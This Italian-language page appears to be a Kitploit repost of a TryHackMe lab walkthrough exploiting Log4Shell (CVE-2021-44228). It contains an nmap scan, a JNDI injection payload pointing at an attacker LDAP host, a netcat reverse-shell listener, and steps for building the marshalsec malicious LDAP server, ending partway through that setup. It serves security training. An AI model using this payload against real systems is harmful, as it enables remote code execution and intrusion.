Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!
solar-exploiting-log4j — Questo repository fornisce una guida dettagliata alla *stanza Solar Exploiting Log4j* su TryHackMe, incentrata sullo sfruttamento della critica vulnerabilità Log4Shell (CVE-2021-44228). Il progetto dimostra come gli attaccanti possano sfruttare meccanismi di logging non sicuri nelle applicazioni Java per ottenere l'esecuzione remota di codice. | Kitploit
Questo repository fornisce una guida dettagliata alla *stanza Solar Exploiting Log4j* su TryHackMe, incentrata sullo sfruttamento della critica vulnerabilità Log4Shell (CVE-2021-44228). Il progetto dimostra come gli attaccanti possano sfruttare meccanismi di logging non sicuri nelle applicazioni Java per ottenere l'esecuzione remota di codice.
Condividi
🔥 Solar Exploiting Log4j - Walkthrough di TryHackMe
📌 Stanza: Solar Exploiting Log4j
Piattaforma: TryHackMe
Difficoltà: Media
Argomento: Log4Shell (Vulnerabilità Log4j)
🧠 Obiettivo
Sfrutta la vulnerabilità Log4j (CVE-2021-44228) per ottenere l'esecuzione remota di codice e catturare le flag.
🛠️ Strumenti Utilizzati
Nmap
Burp Suite
cURL
Netcat
Python HTTP Server
🌐 Fase 1: Ricognizione
🔍 Scansione del Target
root@kitploit:~
nmap -sC -sV <TARGET_IP>
📌 Risultati
Porte aperte: 80 (HTTP), altre in base alla stanza
Applicazione web con backend basato su Java
🌐 Fase 2: Enumerazione Web
Visita l'app web nel browser
Interagisci con gli input (campi di login/ricerca/header)
Cattura la richiesta usando Burp Suite
💥 Fase 3: Identificare la Vulnerabilità Log4j
La vulnerabilità Log4j consente l'iniezione JNDI:
root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}
Se l'input viene registrato nei log → la vulnerabilità esiste.
⚙️ Fase 4: Configurare il Listener
Avvia Netcat
root@kitploit:~
nc -lvnp 4444
Avvia il Server LDAP Malevolo (Esempio)
root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package